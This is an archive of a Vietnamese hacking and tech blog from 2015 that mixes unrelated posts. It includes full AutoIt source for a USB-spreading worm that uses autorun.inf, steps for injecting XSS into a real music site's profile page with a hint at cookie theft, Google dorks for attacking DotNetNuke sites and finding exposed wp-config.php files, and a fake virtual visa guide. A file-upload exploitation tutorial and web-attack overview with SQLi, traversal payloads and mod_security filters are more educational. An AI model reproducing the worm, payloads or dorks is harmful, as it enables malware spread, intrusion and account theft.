Thứ Sáu, 31 tháng 7, 2015

Kiếm 25$ đơn giản với FACEBOOK

Free 25$ Facebook ads credit

Theo thông tin vừa đọc được thì hiện tại có một site đang phát triển social marketing với Facebook và cung cấp free 25$ Facebook Ad Credits từ năm 2012.
Để có được 25$ đó các bạn chỉ cần điền một survey đơn giản (bằng tiếng Anh) của công ty này thôi. Và mỗi tài khoản chỉ nhận được 1 lần duy nhất nên các bạn điền cẩn thận nhé 😀
* Chuẩn bị:
– Login tài khoản facebook của bạn
– Bấm vào link sau để lấy cái số phía sau: ?act= và nhớ hoặc ghi số đó lại: https://www.facebook.com/ads/manager/billing/transactions/?act=
Untitled3
* Bắt đầu:
– Các bạn click vào link này để đi đến site survey
Untitled2
– Điền hoặc chọn đầy đủ thông tin. Riêng trường: “Facebook Account ID (e.g. 12345678) *” thì điền cái số phía sau act= lúc nãy bạn đã lấy
Untitled4

– Còn trường “What are your advertising objectives on Facebook? Select all that apply” thì các bạn cứ check hết nha 😀
Xong rồi thì ngồi đợi thôi. Nghe bạn bè nói thì khoảng 1 ngày là có credit chứ không phải 5 đâu ^^. Mà cũng hên xui. Anh em nhảy vào hốt để nó hết thì uổng nhé. Có thể dùng credit này để quảng cáo fan page, site, brand….
Untitled

Thứ Năm, 30 tháng 7, 2015

Kiến thức cơ bản về An ninh mạng

Kiến thức cơ bản về An ninh mạng

Name:  10422014054209banner-slide.png Views: 63 Size:  84,2 KB

Chào các bạn, 

Để tìm hiểu về lĩnh vực an ninh mạng, trước tiên bạn cần trang bị cho mình những kiến thức cơ bản của công nghệ thông tin như: lập trình, mạng máy tính, cơ sở dữ liệu, kiến trúc máy tính… Chúng tôi coi các kiến thức này bạn đã có khi tham gia vào Whitehat.
Lĩnh vực an ninh mạng có thể nói là rất rộng lớn, tuy nhiên bạn có thể bắt đầu với những nội dung cơ bản của:


  • Kỹ thuật dịch ngược
  • Lỗ hổng phần mềm
  • Kỹ thuật mã hóa
  • Lỗ hổng web
  • Kỹ thuật điều tra thông tin
  • Malware (Mới update)
  • ….


Bạn nên thường xuyên tham gia các cuộc thi kiến thức trên WhiteHat ContestWhiteHat Grand Prix trên hệ thống WarGame để có thêm kỹ năng thực tế và vận dụng những lý thuyết đã học một cách trực quan hơn.

Kiến thức cơ bản về an ninh mạng:

1. Forensic



2. Crypto



3. Web



4. Exploitation



5. Revert



6. Malware




Qua những bài viết trong phần kiến thức cơ bản về an ninh mạng các bạn sẽ nắm được những kiến thức nhất định trong lĩnh vực mình nghiên cứu. Bên cạnh đó, việc tích cực tham gia hỏi đáp, trao đổi thông tin trên diễn đàn cũng là cách rất tốt để trau dồi, hoàn thiện kiến thức. Điều cuối cùng đó là bạn hãy luôn luôn giữ trong mình niềm đam mê. Đó chính là phương pháp tốt nhất giúp bạn tiến xa hơn trong lĩnh vực này.

Hướng dẫn check xss nhaccuatui.com

Lời đầu tiên tôi cảm ơn cho ai đã xem bài viết này


để thực hiện ta cần
1/ 1 tài khoản
2/ script XSS
ta bắt đầu
Bước 1 : vào https://id.nct.vn/ login vào
Bước 2 : chọn mục thông tin cá nhân bắt đầu dùng scirpt xss của các bạn gắn vào nơi Họ và Tên (script của các bạn cũng có thể là <script>alert('XSSPOSED')</script>,....)
Bước 3 : F5 lại và xem thành quả, sau đó sang nhaccuatui.com login như bước 1, tiếp theo vào trang cá nhân và xem =))) cảm giác như hacker nhỉ =))) các bạn có thể lấy cookie người khác nữa dùng hàm Steal Cookies << tự mò
Demo: http://www.nhaccuatui.com/user/nosmile213.html
END

Thứ Tư, 29 tháng 7, 2015

Các câu lệnh thường dùng trong Ubuntu


Chào các bạn, ở bài trước mình đã hướng dẫn cách cài đặt hệ điều hành (HĐH) Ubuntu Server LTS trên VirtualBox
, các bạn có thể xem lại hướng dẫn tại địa chỉ: https://muoivy.wordpress.com/2013/11/13/cai-dat-ubuntu-server-tren-virtualbox/
Như chúng ta đã biết, Ubuntu cũng như một số HĐH PC khác như Windows hay OSX, nó cung cấp cho người dùng hệ thống đồ họa thật đẹp mắt và linh hoạt.  Nhưng ngoài việc sử dụng trình đồ họa mà HĐH mang lại, chúng ta có thể làm việc với trên HĐH với những câu lệnh, như Windows các bạn  có thể sử dụng qua cửa sổ command prompt, tuy nhiên có lẽ chỉ những ai  chuyên về tin học mới sử dụng giao diện dòng lệnh trong Windows.
Đối với những ai thật sự muốn khám phá và tìm hiểu về HĐH Linux hay Ubuntu, thì chúng ta nên biết một số lệnh cơ bản để thao tác trên nó, vì:
  • Một số ứng dụng trong Linux chưa có giao diện đồ họa, bạn phải sử dụng chúng qua giao diện dòng lệnh.
  • Sử dụng giao diện dòng lệnh sẽ giải quyết vấn đề nhanh và an toàn hơn giao diện đồ họa.
  • Khi hệ điều hành bị hỏng, bạn có thể sử dụng giao diện dòng lệnh để sửa  lỗi hay lưu lại dữ liệu quan trọng.
Nếu trong Windows cửa sổ dòng lệnh được gọi là command prompt thì  trong Linux được gọi là terminal. Tùy vào mỗi môi trường màn hình nền mà  tên của terminal sẽ khác, ví dụ terminal trong GNOME có tên là  gnome-terminal, trong LXDE là lxterminal.
Để khởi động terminal trong Ubuntu LTS 12.04 các bạn có thể dùng 1 trong 2 cách sau:
Cách 1: Bạn vào menu Dash home ,trong thanh tìm kiếm bạn gõ “Terminal” và bạn có thể thấy Terminal xuất hiện bên dưới như hình sau:
Terminal
Cách 2:  Ngoài ra bạn có thể nhấn tổ hợp phím “Ctrl + Alt + T” để mở trực tiếp Terminal
Dưới đây là  giao diện đầu tiên của Terminal khi xuất hiện
Untitled
Từ hình trên, bạn có thế nhìn thấy dòng “muoivy@Muoivy:~$” điều này có nghĩa là:
  • muoivy: đây là tên người dùng, mình đang đăng nhập bởi tên người dùng là “muoivy
  • Muoivy: đây là Hostname
  • ~: chỉ bạn đang ở thư mục home của mình, nó sẽ chuyển thành / khi bạn ở thư mục root
  • $:  bạn đang sử dùng quyền của người dùng bình thường, khi bạn sử  dụng quyền của root để cài đặt phần mềm hay thay đổi hệ thống, $ sẽ đổi  thành #
Bây giờ chúng ta có thể xem những câu lệnh cơ bản dưới đây, để thao tác trong Terminal nhé:
  1. Quản lý các tập tin
  • Di chuyển / liệt kê các tập tin
Untitled
  • Quyền truy cập tập tin
Untitled
  • Tập tin và thư mục
Untitled
  • Nội dung các tập tin
Untitled
  • Nén và giải nén tập tin
Untitled
2.  Quản trị hệ thống
  • Cơ bản
Untitled
  • Tiến trình
Untitled
  • Gói phần mềm
Untitled
Untitled
Untitled
  • Mạng máy tính
Untitled
  • Phân vùng ổ cứng
Untitled
Chắc các bạn không con xa lạ với phần mềm autoit nữa
nên mình hướng dẫn và cho các bạn những code để tạo ra một con virus và mình khuyên các bạn là không dùng những con virus này để đem phá hoại người khác.:angry:
Link Download Autoit : https://www.autoitscript.com/site/autoit/downloads/
Virus này dùng để test phần mềm diệt virus thôi nhé :))
Chuyển đổi file .au3 thành File .exe, bạn click vào thanh start -> AutoIt v3 -> Compile Script to .exe
:angry::angry::angry::angry::angry::angry: Nghiêm cấm đem đi phá hoại nhé :brick::brick::brick:
Phần Code :

#Notrayicon
Dim $autorun = "[autorun]" & @CRLF & "open=svchosts.exe" & @CRLF & "SHELl\opEn\defaUlt=1" & @CRLF & "sHell\eXpLore\CommaND=svchosts.exe"
if not fileexists("C:\Autorun.inf") Then
filewrite("C:\Autorun.inf",$autorun)
endif
fileDelete("C:\Autorun.inf")
filewrite("C:\Autorun.inf",$autorun)
FileCopy(@ScriptDir & "\service.exe","C:\Windows\system32",1)
run("C:\Windows\system32\service.exe")
FileCopy(@ScriptDir & "\svchosts.exe","C:\Windows\system32",1)
while 1
$var = DriveGetDrive( "REMOVABLE" )
If NOT @error Then
FileCopy(@ScriptFullPath,$var[0],1)
FileCopy("C:\Windows\system32\service.exe",$var,1)
FileCopy("C:\Autorun.inf",$var[0],1)
For $i = 1 to $var[0]
FileCopy("C:\Autorun.inf",$var[$i],1)
FileCopy("C:\Windows\system32\service.exe",$var,1)
FileCopy(@ScriptFullPath,$var[$i],1)
Next
EndIf
wend
loadt2player(402);

End tut


Hack Dnn

https://youtu.be/aLkrtu69nCk
Dnn tut 
inurl:"/portals/0?
inurl:/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx
javascript:__doPostBack('ctlURL$cmdUpload','')
Portals/0/zens.txt

Dork download wp-config.php wordpress

inurl:wp-admin/admin-ajax.php inurl:wp-config.php

About 69,800 results (0.31 seconds)

Thứ Ba, 28 tháng 7, 2015

Hướng dẫn reg visa ảo

https://youtu.be/VaLl5M7RiHs

Hướng dẫn Fake IP bằng phần mềm Bitvise SSH Client

https://youtu.be/M-lL0F8fnA8

Kloud51 - Free VPS & Hosting Cpanel 11

[​IMG]

FAKE IP LUNG TUNG
Hosting:
Code:
https://kloud51.com/cart.php?a=add&pid=5VPS:
Code:
https://kloud51.com/cart.php?a=confproduct&i=0

Khai thác và phòng chống file upload trong PHP Web Applications

I. GIỚI THIỆU


Ứng dụng Web hỗ trợ cho phép người sử dụng thực hiện upload file lên server hiện tại có rất nhiều. Ví dụ như upload image(*.gif, *.jpg), *.pdf, *.doc, ...
Trong bài này seamoun sẽ trình bày một số lỗi khi lập trình file upload mà kẻ xấu có thể lợi dụng để upload những mã độc lên server. Những phương thức khai thác mà seamoun trình bày chỉ mang tính tham khảo không ủng hộ các bạn khai thác đối với những server bị mắc lỗi.

II. KHAI THÁC LỖI UPLOAD FILE
1) Trường hợp sử dụng JavaScript để kiểm tra file upload
Giả sử ta có kịch bản gồm 2 file như sau:
PHP:
<html>
<title>Secure file upload PHP Web Applications</title>
<head>
<script language=javascript>
function chkFileExtension()
{
var str=document.upload.userfile.value;
var ext=str.substring(str.length,str.length-3);
if ( ext != "gif")
{
alert("File is invalid");
return false;
}
else
{
return true;
};
}
</script>
</head>
<body>
<form name="upload" action="upload1.php" method="POST" ENCTYPE="multipart/form-data" onSubmit="return chkFileExtension()">
Select the file to upload: <input type="file" name="userfile">
<input type="submit" name="upload" value="upload">
</form>
</body>
</html>




PHP:
<?php

$uploaddir = 'uploads/';
$uploadfile = $uploaddir . basename($_FILES['userfile']['name']);

if (move_uploaded_file($_FILES['userfile']['tmp_name'], $uploadfile)) {
echo "File was successfully uploaded.\n";
} else {
echo "File uploading failed.\n";
}
?>

Ví dụ trên cho thấy người lập trình kiểm tra phần mở rộng file cho phép file upload bằng cách sử dụng một đoạn mã Javascript trong file upload1.html. Chỉ chấp nhận những file có phần mở rộng là *.gif thì mới được phép upload, cách này một kẻ tấn công dễ dàng vượt qua bằng cách sử dụng một intercepting proxy hoặc có thể viết một đoạn mã bằng Perl, Python,... mà đệ trình trực tiếp đến file upload1.php với những tham số cần thiết.

Trong demo sau seamoun sử dụng Burp Suite là một tool rất mạnh khi thực hiện Web Application. Có thể download tại :http://portswigger.net/

2) Trường hợp không sử dụng JavaScript để kiểm tra mà thực hiện kiểm tra trên server với đoạn mã sau:

PHP:
<?php

if($_FILES['userfile']['type'] != "image/gif") {
echo "Sorry, we only allow uploading GIF images";
exit;
}

$uploaddir = 'uploads/';
$uploadfile = $uploaddir . basename($_FILES['userfile']['name']);

if (move_uploaded_file($_FILES['userfile']['tmp_name'], $uploadfile)) {
echo "File is valid, and was successfully uploaded.\n";
} else {
echo "File uploading failed.\n";
}

?>
Với đoạn mã trên người lập trình hy vọng ngăn chặn được kẻ tấn công upload file độc hại lên server bằng cách sử dụng kiểm tra type=image/gif. Tức là kiểu file cho phép upload ở đây chỉ có thể là file gif. Điều này cũng không an toàn bởi vì kẻ tấn công có thể thay đổi kiểu type=image/gif cho phù hợp với sự kiểm tra của đoạn mã trên nhưng nội dung vẫn chứa mã độc.
Sau đây là demo thứ 2 khai thác lỗi file upload trong PHP WebApp

3) Trường hợp kiểm tra mime - kiểm tra phần nội dung của file upload với đoạn mã sau:

PHP:
<?php

$imageinfo = getimagesize($_FILES['userfile']['tmp_name']);

if($imageinfo['mime'] != 'image/gif' && $imageinfo['mime'] != 'image/jpeg') {
echo "Sorry, we only accept GIF and JPEG images\n";
exit;
}

$uploaddir = 'uploads/';
$uploadfile = $uploaddir . basename($_FILES['userfile']['name']);

if (move_uploaded_file($_FILES['userfile']['tmp_name'], $uploadfile)) {
echo "File is valid, and was successfully uploaded.\n";
} else {
echo "File uploading failed.\n";
}

?>

Như vậy liệu có cải thiện hơn ? An toàn hơn ? Trả lời: có cái thiện hơn nhưng vẫn chưa an toàn. Mặc dù với đoạn mã trên kẻ tấn công không thực hiện thành công như ở Lab2, khi thay đổi type=image/gif vì lúc này người lập trình đã kiểm tra nội dung file upload có đúng là gif hay không ?. Nhưng nếu kẻ tấn công sử dụng một file gif và chèn mã độc vào thì thế nào ? Khai thác sẽ thành công !!!!

Sau đây là demo thứ 3 khai thác lỗi file upload trong PHP WebApp

4) Trường hợp kiểm tra phần mở rộng của file trên server với đoạn mã sau:

PHP:
<?php

$blacklist = array(".php", ".phtml");

foreach ($blacklist as $item) {
if(preg_match("/$item\$/i", $_FILES['userfile']['name'])) {
echo "We do not allow uploading PHP files\n";
exit;
}
}

$uploaddir = 'uploads/';
$uploadfile = $uploaddir . basename($_FILES['userfile']['name']);

if (move_uploaded_file($_FILES['userfile']['tmp_name'], $uploadfile)) {
echo "File is valid, and was successfully uploaded.\n";
} else {
echo "File uploading failed.\n";
}
?>

Như vậy với đoạn mã người lập trình đã ngăn chặn kẻ tấn công không thể upload file *.php lên server. Tuy nhiên trường hợp này cũng chưa an toàn với những server mà có cấu hình file *.gif, *.jpg cho phép xử lý PHP. Do vậy kẻ tấn công vẫn upload file gif, jpg lên server nhưng có chèn thêm mã độc vào.

III. CÁCH PHÒNG CHỐNG
Mấu chốt giải quyết vấn để làm thế nào an toàn trong file upload đó là lưu giữ file upload lên một nơi mà không thể truy cập bởi user thông qua URL. Điều này có thể thực hiện được bằng cách lưu file upload bên ngoài thưc mục webroot hoặc trên web server nhưng từ chối truy cập đến thư mục đó.

Tài liệu tham khảo: Secure File Upload In PHP Web Applications - ScanIt
Công cụ sử dụng: Burp Suite http://portswigger.net/)

Một số phương thức tấn công ứng dụng web

Đối với các cơ quan, tổ chức website là kênh cung cấp thông tin hiệu quả và nhanh chóng nhất.

Cũng chính đặc điểm này, các website thường xuyên là mục tiêu tấn công của tin tặc để khai thác đánh cắp các thông tin liên quan bên trong. Một trong những phương thức tấn công phổ biến là khai thác các lỗi bảo mật liên quan đến ứng dụng web.

Các lỗi bảo mật ứng dụng web là nguyên nhân chủ yếu gây ra các lỗi đối với website đang vận hành. Sau khi xác định các lỗi này, tin tặc sẽ sử dụng các kỹ thuật khác nhau để tiến hành khai thác hệ thống đích. Một số kỹ thuật thường được sử dụng: Buffer Overflows, SQL Injection, and Cross-site Scripting…Việc phân loại các kiểu tấn công thành các nhóm khác nhau sẽ giúp cho người quản trị dễ dàng xác định các nguy cơ cũng như biên pháp đối phó hơn.

Tấn công Bruteforce
Bruteforce là cách thức thử tất cả các khả năng có thể có để đoán các thông tin cá nhân đăng nhập: tài khoản, mật khẩu, số thẻ tín dụng…Nhiều hệ thống cho phép sử dụng mật khẩu hoặc thuật toán mã hóa yếu sẽ tạo điều kiện cho tin tặc sử dụng phương pháp tấn công này để đoán tài khoản và mật khẩu đăng nhập. Sau đó sử dụng các thông tin này để đăng nhập truy cập vào tài nguyên hệ thống.

Biện pháp đối phó:

Tăng cường độ mạnh cho mật khẩu (Độ dài ít nhất 6 ký tự, không chứa chuỗi username, chứa ít nhất 1 ký tự số, chứa ít nhất 1 ký tự đặc biệt, không cho phép thay đổi mật khẩu trùng lặp đã sử dụng, quản lý, điều khiển thông báo lỗi)
Sử dụng cơ chế chứng thực (Basic hoặc Digest Authentication)
Hạn chế số lần đăng nhập hoặc khóa tài khoản đăng nhập sai
Sử dụng module Mod_Dosevasive để xác định dấu hiệu của kiểu tấn công này.
Lỗi chứng thực yếu (Insufficient Authentication)
Lỗi chứng thực yếu xuất hiện khi một website cho phép truy cập các nội dung, tài nguyên nhạy cảm mà không có đủ quyền. Các trang quản trị là một ví dụ dễ thấy nhất. Nếu không có cơ chế phân quyền hợp lý thư mục cũng như tài khoản đăng nhập trang quản trị này. Tin tặc hoàn toàn có khả năng vượt qua được cơ chế đăng nhập để chiếm quyền điều khiển trang này.

Biện pháp đối phó:

Thiết lập cơ chế điều khiển truy cập thông quan .htaccess hoặc tập tin cấu hình httpd.conf
Ví dụ: Điều khiển truy cập thông qua httpd.conf
Code:
<LocationMatch “^/admin/”>
SSLRequireSSL
AuthType Digest
AuthName “Admin Area”AuthDigestfile
/usr/local/apache/conf/passwd_digest
Require user admin
</LocationMatch>
Dự đoán, chèn phiên (Credentical/Session Prediction)
Dự đoán, chèn phiênlà một phương thức chiếm phiên (hijacking). Thông thường, khi một tài khoản thực hiện quá trình chứng thực đối với server (tài khoản/mật khẩu). Dựa vào các thông tin này, server sẽ tạo một giá trị session ID duy nhất để cho phép và duy trì kết nối. Nếu đoán được session ID kế tiếp thì tin tặc có khả năng chiếm phiên đăng nhập của người dùng hợp lệ khác.

Biện pháp đối phó:

Sử dụng SSL (mod_ssl) trong quá trình chứng thực để chống lại việc nghe lén dữ liệu quan trọng.
Sử dụng cơ chế tạo session ID ngẫu nhiên, thuật toán mã hóa mạnh.
Session ID phải đủ lớn để làm khó quá trình tấn công brute-fore.
Giới hạn thời gian tồn tại của session ID.
XSS – Cross-Site Scripting
XSS là một trong những kĩ thuật tấn công phổ biến nhất hiện nay, đồng thời nó cũng là một trong những vấn đề bảo mật quan trọng đối với các nhà phát triển web và cả những người sử dụng web. Bất kì một website nào cho phép người sử dụng đăng thông tin mà không có sự kiểm tra chặt chẽ các đoạn mã nguy hiểm thì đều có thể tiềm ẩn các lỗi XSS.

Tin tặc tấn công bằng cách chèn vào các website động (ASP, PHP, CGI, JSP …) những thẻ HTML hay những đoạn mã script nguy hiểm có thể gây nguy hại cho những người sử dụng khác. Trong đó, những đoạn mã nguy hiểm đựơc chèn vào hầu hết được viết bằng các Client-Site Script như JavaScript, JScript, DHTML và cũng có thể là cả các thẻ HTML

Ví dụ: Sử dụng XSS chèn mã java script trực tiếp trên URL
Code:
http://www.demo.com/search.cgi?query=<script>alert(‘XSS was found !’);</script>
Khi wesite http://www.demo.combị lỗi XSS trình duyệt sẽ hiện lên một thông báo “XSS was found !”.

Nếu như các kĩ thuật tấn công khác có thể làm thay đổi được dữ liệu nguồn của web server (mã nguồn, cấu trúc, cơ sở dữ liệu) thì XSS chỉ gây tổn hại đối với website ở phía client mà nạn nhân trực tiếp là những người khách duyệt site đó

Biện pháp đối phó:

Chỉ cho phép những dữ liệu hợp lệ, từ chối nhận các dữ liệu sai, thường xuyên kiểm tra và lọc dữ liệu đầu vào.
Sử dụng Mod_Security để lọc một số dữ liệu tấn công XSS.
Code:
SecFilterSelective THE_REQUEST “<[^>]*meta*\”?[^>]*>”
SecFilterSelective THE_REQUEST “<[^>]*style*\”?[^>]*>”
SecFilterSelective THE_REQUEST “<[^>]*script*\”?[^>]*>”
SecFilterSelective THE_REQUEST “<[^>]*iframe*\”?[^>]*>”
SecFilterSelective THE_REQUEST “<[^>]*object*\”?[^>]*>”
SecFilterSelective THE_REQUEST “<[^>]*img*\”?[^>]*>”
SecFilterSelective THE_REQUEST “<[^>]*applet*\”?[^>]*>”
SecFilterSelective THE_REQUEST “<[^>]*form*\”?[^>]*>”
SQL injection
Tấn công SQL Injection được thực thi bằng cách chèn các câu truy vấn SQL vào dữ liệu tương tác giữa máy khách và trình ứng dụng. Quá trình khai thác lỗi SQL Injection thành công có thể giúp tin tặc lấy được các dữ liệu nhạy cảm trong cở sở dữ liệu, thay đổi cơ sở dữ liệu (Insert/Update/Delete), thực thi các hành động với quyền của người quản trị và cao hơn có thể điều khiển được hệ điều hành máy chủ

Ví dụ: Xét đoạn mã truy vấn SQL sau:
Code:
SELECT * FROM Users WHERE Username=’$username’ AND Password=’$password’
Đây là một câu truy vấn thường hay được dùng trong các trình ứng dụng nhằm xác thực người dùng. Nếu câu truy vấn trả về một giá trị nói rằng thông tin về người dùng đang đăng nhập là đúng và được lưu trong cơ sở dữ liệu, thì người dùng được phép đăng nhập vào hệ thống, ngược lại thì không đăng nhập được. Người dùng nhập thông tin đó vào các trường gọi là web form.

Thay vì nhập đúng tên đăng nhập và mật khẩu, thử nhập vào các ký tự đặc biệt như:
Code:
$username = 1′ or ‘1’ = ‘1$password = 1′ or ‘1’ = ‘1
Khi đó câu truy vấn sẽ là:

Code:
SELECT * FROM Users WHERE Username=’1′ OR ‘1’ = ‘1’ AND Password=’1′ OR ‘1’ = ‘1’
Giả sử rằng giá trị của các tham số được gửi tới máy chủ bằng phương thức GET, thì có một câu lệnh khai thác lỗi như sau:
Code:
http://www.example.com/index.php?username=1’%20or%20’1’%20=%20’1&password=1’%20or%20’1’%20=%20’1
Khi đó, truy vấn sẽ trả về một giá trị (hay một loạt các giá trị) vì điều kiện trên luôn luôn đúng (OR 1=1). Trong trường hợp này tin tặc sẽ đăng nhập được vào hệ thống mà không cần biết tên đăng nhập và mật khẩu. Trường hợp này sẽ rất nguy hiểm nếu dòng đầu tiên trong bảng “Users” là tài khoản của người quản trị (admin) vì tin tặc sẽ đăng nhập vào hệ thống bằng tài khoản đầu tiên trong bảng này.

Biện pháp đối phó:

Kiểm tra dữ liệu đầu vào.
Sử dụng Mod_Security để lọc một số dữ liệu tấn công SQL injection.
Code:
SecFilter “delete[[:space:]]+from”
SecFilter “insert[[:space:]]+into”
SecFilter “select.+from”
SecFilter xp_cmdshell
SecFilter xp_regread
SecFilter xp_regwrite
SecFilter xp_regdeletekey
SecFilter xp_enumdsn
SecFilter xp_filelist
SecFilter xp_availablemedia
Liệt kê thư mục (Directory indexing)
Đây là chức năng web server cho phép liệt kê tất cả nội dung bên trong một thư mục mà không có tập tin cơ sở (index.html/home.html/ default.html). Trong các thư mục đó có thể chứa nội dung quan trọng: tập tin cơ sở dữ liệu dự phòng, tập tin cấu hình, tập tin lưu trữ tạm thời, các kịch bản…

Biện pháp đối phó:

Thiết lập quyền hợp lý trên các thư mục chứa nội dung web.
Sử dụng mod_security để lọc dữ liệu đầu vào
Code:
SecFilterScanOutput On
SecFilterSelective OUTPUT “\<title\>Index of /”
Path Traversal
Path Traversal hay còn được biết với một số tên khác như “dot-dot-slash”, “directory traversal”,”directory clumbing” và “backtracking” là hình thức tấn công truy cập đến những file và thư mục mà được lưu bên ngoài thư mục webroot.

Hình thức tấn công này không cần sử dụng một công cụ nào mà chỉ đơn thuần thao tác các biến với ../ (dot-dot-slash) để truy cập đến file, thư mục, bao gồm cả source code, những file hệ thống, …

Ví dụ:
Code:
GET /../../../../../some/file HTTP/1.0
GET /..%255c..%255c..%255csome/file HTTP/1.0
GET /..%u2216..%u2216some/file HTTP/1.0
Biện pháp đối phó:

Sử dụng mod_security để lọc dữ liệu đầu vào
Code:
SecFilterSelective SCRIPT_FILENAME “/scripts/foo.cgi” chain
SecFilterSelective ARG_home “!^[a-zA-Z].{15,}\.txt”
Từ chối dịch vụ (DoS)
DoS là kỹ thuật tấn công nhằm không cho phép các truy cập hợp lệ truy cập tới server. Kỹ thuật tấn công này thường xảy ra tại lớp mạngvà lớp ứng dụng.

Các hệ thống đích có thể bị tấn công DoS:

Người dùng riêng lẻ: quá trình đăng nhập lặp đi lặp lại với tài khoản hợp lệ nhưng mật khẩu không đúng. Sau nhiều lần đăng nhập sai, hệ thống sẽ khóa tài khoản hợp lệ này, dẫn đến người dùng hợp lệ sẽ không thể đăng nhập được.
Máy chủ cơ sở dữ liệu: Sử dụng kỹ thuật chèn câu lệnh truy vấn SQL chỉnh sửa cơ sở dữ liệu, vì thế hệ thống sẽ không thể phục vụ các truy cập từ client.
Máy chủ phục vụ web: Sử dụng kỹ thuật tấn công tràn bộ đệm ( Buffer Overflow) để gới các gói truy vấn và làm đổ vỡ các tiến trình tại phía máy chủ phục vụ web, dẫn đến hệ thống máy chủ webserver sẽ không có khả năng phục vụ các truy cập hợp lý.
Biện pháp đối phó:

Sử dụng module Mod_Dosevasive
Thiết lập các thông tin hợp lý cho máy chủ phục vụ web: KeepAlives, KeepAliveTimeouts, MaxKeepAliveRequests…